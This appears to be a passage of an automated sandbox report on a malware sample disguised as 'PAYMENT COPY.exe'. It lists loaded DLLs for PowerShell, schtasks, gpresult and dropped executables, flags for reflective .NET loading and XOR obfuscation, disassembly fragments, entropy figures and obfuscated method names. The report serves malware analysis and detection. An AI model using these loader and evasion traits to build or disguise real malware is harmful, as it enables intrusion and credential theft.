Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: rasadhlp.dll

Source: PAYMENT COPY.exe, GameOfLife.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: PAYMENT COPY.exe, GameOfLife.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: bQrgcvrrXfGN.exe.0.dr, GameOfLife.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: bQrgcvrrXfGN.exe.0.dr, GameOfLife.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	.Net Code: w94dfHakMO System.Reflection.Assembly.Load(byte[])
Source: 0.2.PAYMENT COPY.exe.3e85828.6.raw.unpack, DXmpSuDxiAr5R4r1KM.cs	.Net Code: w94dfHakMO System.Reflection.Assembly.Load(byte[])
Source: 0.2.PAYMENT COPY.exe.5d00000.7.raw.unpack, LoginForm.cs	.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00403870 push eax; ret	9_2_00403872
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00401877 push eax; retf	9_2_0040187A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00415018 push 0000006Bh; ret	9_2_0041502C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0041908C push ds; iretd	9_2_004190AB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040D919 push 3C70F55Dh; retf	9_2_0040D91E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00418922 push edx; iretd	9_2_00418925
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00402233 push 00000003h; ret	9_2_00402235
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040223B push 00000003h; ret	9_2_0040223D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004022A7 push edx; retf	9_2_004022B3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00408B64 push FFFFFF91h; retf	9_2_00408B6C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00407BC2 push edx; ret	9_2_00407BC3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004023E7 push 00000003h; ret	9_2_0040240F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004193B8 push edi; ret	9_2_004194CE
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040242E push 00000003h; ret	9_2_0040240F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004054A9 push 00000071h; retf	9_2_004054AB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0041AD23 push edi; iretd	9_2_0041AD29
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00414F7E push 0000006Bh; ret	9_2_0041502C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0149225F pushad ; ret	9_2_014927F9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014927FA pushad ; ret	9_2_014927F9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C09AD push ecx; mov dword ptr [esp], ecx	9_2_014C09B6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0149283D push eax; iretd	9_2_01492858
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_05381C91 push edi; iretd	10_2_05381C96
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B51BE6 push esi; ret	12_2_03B51BE7
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B61BE9 push ds; ret	12_2_03B61BF2
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B5C3CF push ds; iretd	12_2_03B5C3EE
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B6215C push 7ACF5629h; iretd	12_2_03B6216A
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B5E066 push edi; iretd	12_2_03B5E06C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B6205B pushfd ; retf	12_2_03B6205C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B627A4 push ds; ret	12_2_03B627CC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B62797 push ds; ret	12_2_03B627CC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B487EC push 00000071h; retf	12_2_03B487EE

Source: PAYMENT COPY.exe	Static PE information: section name: .text entropy: 7.978446114894073
Source: bQrgcvrrXfGN.exe.0.dr	Static PE information: section name: .text entropy: 7.978446114894073

Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, xudyXVGGhENxjEKe7l.cs	High entropy of concatenated method names: 'opixYoNVZ9', 'rRvx2LML3j', 'ToString', 'GKNxHrhJh6', 'lU1xsp3IFf', 'YkaxXZ4DWN', 'MW6xw95Eaq', 'bhVxLLUXi6', 'siuxExpWtX', 'rh3xDfZ48k'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, O2SWHNtpZUOmUXTPuI.cs	High entropy of concatenated method names: 'ikXs9O85ke', 'SxVsFnmgBf', 'zDfs8KnoVZ', 'hl3sGgRmn6', 'p7Isq7XS1o', 'S0xseOiPK0', 'p02s4dgbxl', 'mfIs0c8oVs', 's66scJ9160', 'iimsmks8yZ'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, DlOg4bVmYotQ9Zsdux.cs	High entropy of concatenated method names: 'SSMLRgVnRm', 'n0OLs21AvD', 'rE2Lwm33bI', 'XhZLEoPIMv', 'CYXLDFacGA', 'YkPwq5lmms', 'u91weeHmVS', 'JwIw4AZ3qa', 'uDww0TyCCi', 'ELqwcsbnja'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, UaEX7JXn1kKqCn7X0H.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lrdbcEMMih', 'MIAbmvujbP', 'b4Zbz9bHhE', 'AH2JuZmvZh', 'wUFJvi7bkA', 'KFgJb2f3N3', 'CQdJJBKeF4', 'eOcMmiHULRX5gX2nIAG'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, bu8uMqvuxlbZHE5L184.cs	High entropy of concatenated method names: 'oieWnmaPCs', 'EilWi01S1Q', 'PsXWfIfrJp', 'hPSWa7BlRl', 'fowW33Ct3k', 'lo7WTadAZK', 'L2DWkQTIl9', 'ctFWtXxLDb', 'kqYWpN8EHE', 'ju0WBCZWS3'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, jRmVIDmbhk0FdK3MHQ.cs	High entropy of concatenated method names: 'lVfWvJP2ne', 'PqXWJp7bXo', 'iqIWd2XqLD', 'KyGWHUafkn', 'M4hWsD5UZn', 'luwWwbAs4m', 'Ew2WL2aojh', 'ipOC4N6OVA', 'GR4C08qDfk', 'qcCCcWAleD'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, bRPUsjOjWL1u9OdLfZ.cs	High entropy of concatenated method names: 'cZgEn4XQEn', 'j3XEihSNKC', 'CcSEflavnH', 'svAEarcL2T', 'VsdE3ECMqd', 'eYJET6keM7', 'GpjEkpGhBk', 'aRYEttQjNI', 'P07EpRvTks', 'JnGEBYEv0i'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, HmW280ccjwadiB8Llw.cs	High entropy of concatenated method names: 'WcGCV2NCOL', 'J6MCgW3FmO', 'x3WClxN3px', 'urrCyU25oM', 'MZcC9WGMDp', 'P23CP1Oc28', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, syEU370nRtqeod8F9I.cs	High entropy of concatenated method names: 'w6nCHTSnQ1', 'bQqCspE63l', 'XatCXwMjqP', 'OWBCwFI5db', 'SdvCL8NSr9', 'pCdCEE19ap', 'LSZCDEnBDv', 'KEACNUDUv1', 'NXYCYXMqFB', 'ygCC2FBhlk'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, Hy0i60zrWMeUFdfF48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B7qWjKGmaq', 'W81W7nlp2K', 'LhqWKQ7jEC', 'CiOWxP4Pxe', 'yAZWCcYMCZ', 'Q3CWW09CAq', 'y2tWZqF0CD'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, MoqQA5AkmEQg0AXMs8.cs	High entropy of concatenated method names: 'RfQEHw29Pu', 'nM2EXWaHQI', 'QXNELpVJEj', 'IKMLmr3R14', 'DFILzZnfpr', 'kadEu264Pn', 'wmbEvQCtJQ', 'onlEbpoUsy', 'OrrEJWQPyY', 'W5uEdIZA5M'
Source: 0.2.PAYMENT COPY.exe.70d0000.9.raw.unpack, eaaGqlpqNLaOV5QOy7.cs	High entropy of concatenated method names: 'RDCXaTRNoF', 'KQ8XT8apa5', 'UGyXtaKF5b', 'c7mXpxYvmn', 'psZX7Xvtar', 'NjFXKd5E1M', 'rmCXxPhcM8', 'A4pXCAoW1n', 'caWXW0EVu4', 'sChXZ87Zov'
